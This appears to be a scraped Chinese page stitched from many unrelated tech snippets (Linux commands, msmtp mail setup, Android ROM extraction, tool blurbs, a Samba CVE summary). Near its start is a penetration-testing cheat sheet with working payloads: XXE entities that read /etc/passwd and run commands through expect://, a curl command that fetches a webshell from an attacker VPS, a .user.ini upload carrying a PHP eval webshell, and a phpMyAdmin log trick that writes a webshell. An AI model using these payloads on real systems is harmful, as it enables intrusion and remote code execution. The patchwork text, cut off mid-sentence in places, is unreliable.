功能类似于JSFinder,开发由来就是使用它的时候经常返回空或链接不全,作者还不更新修bug,那就自己来咯
一、安装Linux下面的一个邮件客户端Msmtp软件(类似于一个Foxmail的工具)
1.3、XXE相关技巧 1.3.1、XXE载荷构技巧 使用seclists的XXE-Fuzzing.txt的第9行,做一个简单改造即可使用。对比如下: 改造前: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 改造后: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> XXE-Fuzzing.txt的路径:SecLists\Fuzzing\XXE-Fuzzing.txt 有了上述载荷以后,再加上回显位置即可成功利用,完整载荷示例: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> <name> <email> &foo; </email> </name> 1.3.2、命令执行&&getshell 命令执行的原理是把文件读取用的file://协议换成了expect://协议。 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://id" >]> <name> <email> &foo; </email> </name> getshell则是命令执行的变种,通过上传webshell来。 利用前提:知道目标服务器的脚本语言类型和webshell上传后的大致位置。如果是OSS上,直接寄。 1)使用python托管webshell python -m http.server 8088 2)下载webshell <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://curl$IFS'vps_addr:port/111.php'$IFS-o$IFS'222.php'" >]> <name> <email> &foo; </email> </name> 此处webshell下载解析: curl -O vps_addr:port/111.php curl vps_addr:port/111.php -o 222.php 空格用$IFS来替代,没啥好说的,常规思路。 下载url不能带协议 下载url用单引号包裹,如果是-o方式,保存文件的名称也用单引号包裹起来。 1.4、.user.ini文件上传 这个跟.htaccess差不多,.user.ini是php给用户的自定义配置文件,可将指定文件按照php脚本文件的形式解析。 介绍:https://blog.csdn.net/cosmoslin/article/details/120793126 利用过程: 1)上传.user.ini filename:.user.ini Content-type:image/jpeg 文件正文: GIF89a auto_prepend_file = aaa.jpg 2)上传webshell filename: aaa.jpg Content-type:image/jpeg 文件正文: GIF89a <?php @eval($_POST[22]);?> # 可替换为其他webshell 1.5、盲注分析 导出数据包: 文件——导出分组解析结果——为纯文本 通过notepad++解码: 提取所有注入数据包,此处使用notepad++中的标记功能,查找模式设置为正则表达式。 提取出来以后,找到临界值。当上面的查询语句从1,1到2,1,则上一条语句的=''的值就是SQLi获取到的数据。 找到所有数据后,用英文的逗号隔开,然后使用convert从dec转成text。 1.6、phpmyadmin后台写日志马 前提:知道web根目录。 set global general_log = 'on'; set global general_log_file = 'c:/phpstudy/111.php' select "<?php @eval($_POST[22]);?>" web根目
echo命令用于在终端设备上输出字符串或变量提取后的值,语法格式为“echo [字符串] [$变量]”。
(1) 物理内存free值:# free -m | grep Mem | awk '{print $4}'
1、下载安装:http://downloads.sourceforge.net ... 206451&big_mirror=0 # tar jxvf msmtp-1.4.16.tar.bz2 # cd msmtp-1.4.16 # ./configure --prefix=/usr/local/msmtp # make # make install 2、创建msmtp配置文件和日志文件(host为邮件域名,邮件用户名test,密码123456) # vim ~/.msmtprc account default host 126.com from test@126.com auth login user test password 123456 logfile ~/.msmtp.log # chmod 600 ~/.msmtprc # touch ~/.msmtp.log 3、mutt安装配置:(一般linux下有默认安装mutt) # vim ~/.muttrc set sendmail="/usr/local/msmtp/bin/msmtp" set use_from=yes set realname="memory" set from=test@126.com set envelope_from=yes set rfc2047_parameters=yes set charset="utf-8" 4、邮件发送测试(-s邮件标题,-a表加附件) # echo "邮件内容123456" | mutt -s "邮件标题测试邮件" -a /scripts/test.txt test@126.com
1.漏洞信息 samba远程命令执行漏洞 CVE编号 CVE-2017-7494 影响版本 Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本 危害 命令执行/代码执行 级别 高 2.漏洞原理 samba运行连接一个远程的命名管道,并且会在连接前调用is_known_pipename()函数验证管道名称是否合法,但是该函数不会检查管道名称中的特殊字符,加载了使用该名称的动态链接库,导致攻击者可以构造一个恶意的动态链接库文件,执行任意代码,相当于Linux版的永恒之蓝 3.
在没有监控软件的情况下,只要服务器能上互联网,就可通过发邮件的方式来提醒管理员系统负载与CPU占用的使用情况。 一、安装linux下面的一个邮件客户端msmtp软件(类似于一个foxmail的工具)
企业版 - OrientDB企业版是作为一个专有软件发布的,它是建立在社区版。它作为社区版的延伸。
In this quick tutorial, I explain how to install programs in Linux using terminal commands. This particular tutorial uses Linux Mint 18 (Cinnamon 64-bit), but the commands provided below are universal to other versions of Linux, such as Ubuntu. For those of you who are new to Linux, chances are you’ll be familiar with the in-built Software Manager:
这两天有个临时的任务,某个游戏的开发人员需要定时提取一个表里面的数据,用来做一些统计分析的处理。由于线上的权限控制的比较严格,所以需要DBA在每天早上的10:00准时发送前一天的数据。这个需求如果人工的去执行,那么每天都要记得这个事情,如果某一天忘记了,那就不好了。
在Linux系统中,命令行的强大功能离不开各种参数扩展(Parameter Expansion)的支持。通过对参数进行不同方式的扩展,用户可以在命令行中实现复杂的字符串处理任务。本文将深入讲解Linux中的几种常见参数扩展方法及其应用场景,并通过实例帮助读者理解这些概念。
dpkg是Debian Package的缩写,是专门为Debian开发的软件包管理系统,方便安装、管理、更新。
本文将深入揭示提取Android ROOT权限的完整过程。这一过程与网上的方法有很大的差异。很多网上提取ROOT权限的方式都是使用别人做好的程序,有的甚至点击一下按钮就会自动完成所有的工作。这样做尽管可以成功提取ROOT权限,但读者并不能了解其中的原理,而且由于Android设备的千差万别,可能并不是每一种Android设备都可以很容易找到提取ROOT权限的工具。所以最通用的方法就是尽可能利用现成的工具来完成提取ROOT权限的工作。那么现成的工具有什么呢?其实主要就是Android源代码以及Linux内核源代码。也就是说,大多数工作都可以通过这些源代码来解决。当了解了这一过程的原理后,如果并没有找到合适的提取ROOT权限的工具,就可以通过本文介绍的方法很容易获取Android设备的ROOT权限。
Helm是k8s的包管理工具,类似Linux系统常用的 apt、yum等包管理工具。
经常会碰到列数特别多的文件,而屏幕又不足以放下这么多列;即便能放下,也不容易清晰的辨别出想提取的信息在第几列。 根据我们前面的学习,可以用一行命令或简单的写一个bash脚本来处理这个问题。 命令如下,命令的解释见 Linux学习-文件排序和FASTA文件操作。 ```bash ct@ehbio:~$ vim test ct@ehbio:~$ cat test sample A B C D E F G H ID1 1 2 3 4 5 6 7 8 ID2 1 2 3 4 5 6 7 8 ID3 1 2 3 4
2. ROM的提取 这一节介绍如何从ROM中提取文件。最常用的就是提取apk文件。在论坛中经常看到求救帖子:“大侠,救命哇,我把XXXX.apk给删掉了,手机出错。。。”。我说,你完全可以自救,不必在论坛里跪求他人或在线等。出路很简单:就是自己先做备份或有手段去提取文件。另外,如果你掌握了文件的提取方法,你就可以从其它ROM中方便地移植你喜欢的应用程序和功能了。例如,移植输入法,更换主题或桌面,等等。 所谓ROM的提取或从ROM中“提取”文件,实际上就是要对factoryfs.rfs文件进行解包,把里面要用的文件复制出来。factoryfs.rfs是镜像文件,用了三星自定义的格式。RFS是Robust File System的缩写。在刷机包里还有cache.rfs和dbdata.rfs,都是同类镜像文件。对它们的解包打包方法是相同的。下面来介绍几种常用解包方法。 1) 直接从卡刷ROM包提取 如果你的ROM是“卡刷”包,直接提取就好啦,不需要解包。卡刷包是zip格式的压缩文件。用WinRAR或WinZip直接解压ROM文件就得到所有的原文件。一个典型的ROM打开后有三个文件夹: META-INF 签名文件和刷机脚本文件 system 这就是factoryfs.rfs内的所有内容 updates 存放内核和基带 进入/system/app目录,一切apk程序都在这里,对应于factoryfs.rfs内的内容和手机的/system目录。刷机就是把/system下的内容复制到规定的分区 2) 用RE管理器从手机里提取,复制到SD卡 还有一种ROM的提取方法,不需要其它软件。用RE管理器,利用它的“多选”-“全选”-“复制”功能,一次把多个文件复制到手机的SD卡上。然后,进入“大容量存储”把文件拷贝到计算机里。这也是做备份的一种常用方法。 3) 利用91手机助手从手机提取 还有一种不需要对ROM解包就可以提取到文件的途径。如果你是91手机助手的使用者,你一定熟悉它。打开91手机助手的文件管理,想提取那个就提取那个。把文件直接拖出来放到你的计算机里就行了。 4) MagicISO/UltraISO/WinImage软件 由于factoryfs.rfs是镜像文件,你可以用某些镜像解包软件来打开刷机文件factoryfs.rfs。常用的软件有MagicISO和UltraISO。论坛里有介绍和下载链接。我在上一节的例子中就是用到MagicISO。类似的软件有很多,你们可能各有利器。最近,也用过WinImage,结果相同。 注意:这些软件只能用于解包提取文件之用,不能进行RFS打包操作。 5) 在Linux下通过对factoryfs.rfs的解包 在Linux环境下,通过对factoryfs.rfs进行解包操作是提取ROM的高级手段。在下一节详细叙述。 3. RFS的解包和打包 先强调一下,我们这一节讲的RFS文件的解包和打包不是为了提取文件之用。我们的目的并不仅仅停留在提取ROM文件上的层面上。更重要的是,我们不但要对factoryfs.rfs能解包,我们需要对包内的内容进行修改后还要能够再打包成RFS文件格式。其最终目的是为了定制自己的ROM刷机包。从技术上讲,RFS文件的打包只能在Linux系统下进行。我们在这一节就介绍如何在Linux系统下对RFS文件的解包和打包。 1) 在计算机的Linux系统下 计算机已经安装了Linux操作系统和配置了java环境。下面是对factoryfs.rfs的解包和RFS打包过程。在Linux下主要使用mount和umount两个命令,要求具有超级用户权限。操作步骤如下: a)先创建一个子目录:/home/sunny/Work b)把factoryfs.rfs复制到/home/sunny/Work这个子目录 c)再在Work之下创建一个子目录System d)在用户终端/home/sunny/Work输入 $ su Password:XXXXXXXX(你的Root口令) 输入“Password”后,获得超级用户权限,提示符变成 root@ubuntu:/home/sunny/Work# e)在超级用户终端/home/sunny/Work# 输入下列命令,挂载 RFS文件factoryfs.rfs 为一个磁盘: # mount –o loop factoryfs.rfs System 进入“磁盘”System目录,你就可以看到factoryfs.rfs解包后的所有内容。像对待正常文件夹一样,你可以用“文件夹”浏览器查看 System文件夹里面的内容,但是不能删除
使用命令启动 Conpot conpot -f --template IEC104。
导读 最糟糕的密码不是弱密码,而是根本没有密码。作为系统管理员,您必须确保每个用户帐户都有一个强密码。接下来我将简要的解释如何在 中查找密码为空的帐户。
GoScan是一款交互式网络扫描客户端,可用来执行主机扫描、端口扫描和服务枚举等任务。它不仅可在时间有限的情况下完成高难度任务,而且还支持进行专业的安全管理。
文件系统 /bin (/usr/bin、/usr/local/bin) 这个目录存放着经常使用的命令 /sbin (/usr/sbin、/usr/local/sbin) 系统管理员使用的系统管理程序 /home 存放普通用户的主目录,一个用户一个子目录 /root 该目录为系统管理员,也称作超级权限者的用户主目录 /lib 系统开机所需要的动态连接共享库,类似windows的DLL文件 /lost+found 这个目录一般情况下是空的,当系统非法关机后,这里就存放了一些文件 /etc 所有的系统
emacs是一款功能强大的编辑器,与其说是一款编辑器,它更像一个操作系统。emacs带有内置的网络浏览器、IRC客户端、计算器,甚至是俄罗斯方块。当然,emacs需要在图形化界面的Linux中使用。
提供我的版本,如有需要可以到MySQL官网自行下载 https://pan.baidu.com/s/1LVGo_i9RRbhj8fLHzC84HA
Linux中的命令行界面常被称为Shell。操作系统的Shell就是“外壳”的意思,区别于操作系统的内核部分,是指“为使用者提供操作界面”的软件(命令解析器)。它接收用户命令,然后执行相应的应用程序。基本上Shell分两大类:
4、下载ubutu安装包并解压,这个是Ubuntu_1804.2019.522.0_x64版本。将下载的安装包为appx的扩展名改为zip。可以从这个地址下载:见文末。然后解压。用管理员身份执行ubuntu.exe程序。等几分钟输入用户名和密码。
本系列文章总结归纳了一些软件测试工程师常见的面试题,主要来源于个人面试遇到的、网络搜集(完善)、工作日常讨论等,分为以下十个部分,供大家参考。如有错误的地方,欢迎指正。有更多的面试题或面试中遇到的坑,也欢迎补充分享。希望大家都能找到满意的工作,共勉之!~
Redis是一个开源的key-value存储系统。它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。在学习之前安装redis就显得非常重要了。本文将以安装redis7为例。
thr0cyte,Gr33k,花花,MrTools,R1ght0us,7089bAt
命令格式:for{%variable |%% variable } in (集合) do
LibreNMS是一款基于PHP/MySQL/SNMP的自动发现的网络监控系统,其中包括对广泛的网络硬件和操作系统的支持,包括Cisco,Linux,FreeBSD,Juniper,Brocade,Foundry,HP等。
本文记录了对某发行版Linux中一个安全模块(LSM)的逆向过程,该LSM对系统中待运行的程序进行安全校验,数据流穿越内核态与用户态,涉及系统内核及系统服务。此LSM对系统安全性的增强效果明显,其设计思路值得防守方研究学习,可于个人终端或服务器安全防护中应用。特此对逆向内容记录,希望能为读者在终端防护方面拓宽思路,同时欢迎感兴趣的师傅们交流学习。
netfilter 是 linux 内核的一个模块,这个模块当于 linux 系统的防火墙,它会对所有进出 linux 系统的网路数据进行管理,netfilter 防火墙模块的结构如下图所示:
滥用容器( container)及逃逸的方法有多种,本文将讨论最基本的一种,即滥用docker socket来逃逸容器并在宿主机上以root身份执行代码。
1.进入文件夹 cd 文件夹名称 2.复制文件夹 cp 文件名 指定目录 copy文件到指定目录 例如 cp 文件名称 文件路径/var/www 例子 cp /root/gqxnb/gqx /var/www 3.查看文件夹目录 lsattr [-adRvV] [文件或目录…]选项介绍: ls也可以 4.复制 cp 5. 文件移动命令mv 6. 文件删除命令rm 7.重命名文件和文件夹 linux下重命名文件或文件夹的命令mv既可以重命名,又可以移动文件或文件夹. mv 修改前文件名 修改后文件名,按回车。
shell为用户与Kernel之间的一个接口:shell主要是一个命令解释器,它接受并解释用户输入的命令,然后将这些命令传给内核,最后由内核来执行这些命令。Bourn shell是现在所有shell的始祖,C shell增加了若干Bourn shell没有的特性,如命令行历史、别名和作业控制等。Korn shell增加了若干Bourn shell的超集,它具有类似C shell的加强功能。bash与Bourn shell兼容同时加入了csh、ksh和tcsh的一些有用的功能、GNU项目开发、也是实际上的标准Linux shell。系统中所有shell都存放在/etc/shells文件中。
Tips: 单个 Linux 分发版可以在 WSL 1 或 WSL 2 体系结构中运行。 每个分发版可随时升级或降级,并且你可以并行运行 WSL 1 和 WSL 2 分发版。
新版本无法通过修改/etc/inittab的id:initdefault调整运行级别
Stegseek是迄今为止全世界最快的Steghide破解器,该工具每秒能够处理数百万的密码。虽然Stegseek是一款轻量级工具,但丝毫不影响其功能性的强大。该工具作为原始Steghide项目的一个分支而构建,它的速度比其他破解器快上千倍。在该工具的帮助下,广大研究人员可以轻松从使用了Steghide隐写&加密的文件中提取出隐藏的数据。
RAR 是一种流行的文件压缩格式,以其高效的压缩算法和将大文件压缩为较小档案的能力而闻名。虽然 Linux 本身支持 ZIP 和 TAR 等常见档案格式,但处理 RAR 文件需要额外的工具。在这篇博文中,我们将探讨如何在 Linux 中打开、提取和创建 RAR 文件。
我们通过GoldenGate技术在Oracle DB和Kafka代理之间创建集成,该技术实时发布Kafka中的CDC事件流。
随着分布式微服务的火爆,越来越多的服务需要一个个的部署很麻烦,随之带动了自动化部署的趋势.小编也是刚刚入门,自动化的部署还没有学完,刚刚接触Docker,觉得非常方便,直接运行镜像就可以!!
树莓派需要一个操作系统才能工作。树莓派操作系统(以前称为 Raspbian)是官方支持的操作系统,现在更名为Raspios,所以原先博客的Raspbian含有下载链接都失效了。 目前最新的是Buster版本,如果官网更新了就下载最新的即可,要注意后面修改软件源的时候要选择Buster的源。 附上下载链接: 点击下载提取码:vfq7 我下载的是这个
当使用cmd /V:ON或cmd /V:O时可以不使用call命令来扩展变量,使用 %var% 或 !var! 来扩展变量,!var!可以用来代替%var%
Every Unix file has a set of permissions that determine whether you can read, write, or run the file. Running ls -l displays the permissions. Here’s an example of such a display:
链接:https://pan.baidu.com/s/1HyVFBJLlQPKGMOyXpao0cw 提取码:q2a6 下载完成之后通过 winscp 工具将压缩包上传到 /usr/local 路径下
KITT渗透测试框架是一种基于Python实现的轻量级命令行渗透测试工具集,本质上上来说,它就是一个针对渗透测试人员设计的开源解决方案。在KITT的帮助下,广大研究人员能够以另外,KITT还可以帮助用户轻松访问大量专业的渗透测试工具,并支持二进制等级的自定义配置。
领取专属 10元无门槛券
手把手带您无忧上云